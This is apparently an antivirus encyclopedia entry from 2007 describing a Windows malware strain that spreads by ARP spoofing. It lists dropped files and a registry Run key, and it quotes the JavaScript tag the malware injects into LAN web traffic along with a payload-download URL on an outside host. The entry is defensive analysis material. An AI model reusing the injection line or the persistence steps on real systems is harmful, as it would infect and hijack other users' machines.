首页 人物 事件 电影 电视 比赛 知识 最牛 资讯 电脑 杀毒 维护 生活 口才 职场 站长 QQ 专杀 顶牛 影视 分类 韩国购物

Packes.MakePE.a

病毒名称(中文):

病毒别名:

威胁级别:★★☆☆☆

病毒类型:文件捆绑器

病毒长度:196608

影响系统:WinNT Win2000 WinXP Win2003


病毒行为:

    该病毒是一个具有ARP欺骗攻击的病毒。病毒运行后会复制自身至系统文件夹,然后释放病毒文件,生成注册表启动项以开机运行。病毒会向局域网80端口发送病毒数据,修改网页源码,下载大量隐蔽软件安装至用户计算机。

1.复制自身至
%sys32dir%\drivers\svchost.exe
释放
%sys32dir%\Packet.dll
%sys32dir%\WanPacket.dll
%sys32dir%\wpcap.dll
%sys32dir%\drivers\npf.sys
%sys32dir%\drivers\scvhost.exe

2.生成启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KVP "%sys32dir%\drivers\svchost.exe"

3.发送 ARP 欺骗扫描局域网,劫持
172.16
192.10
10.0
开头的IP段,向发送至80端口的数据包中插入
< script language=\"javascript\" src=\"http://flyget.8800.org/ad.js\">

4.下载大量隐蔽软件安装至用户计算机
hxxp://flyget.8800.org/xxx.exe


作者:yipai    文章来源:金山毒霸病毒百科    点击数:    更新时间:2007-9-15
·用博客寻找爱情 ·厦门人就上厦门顶牛社区 ·星期天去哪聚会 ·免费发布企业招聘
·在线一亿片视频观看 ·挑战美女无极限 ·创建我的书签 ·我要卖东西,买东西
希优商城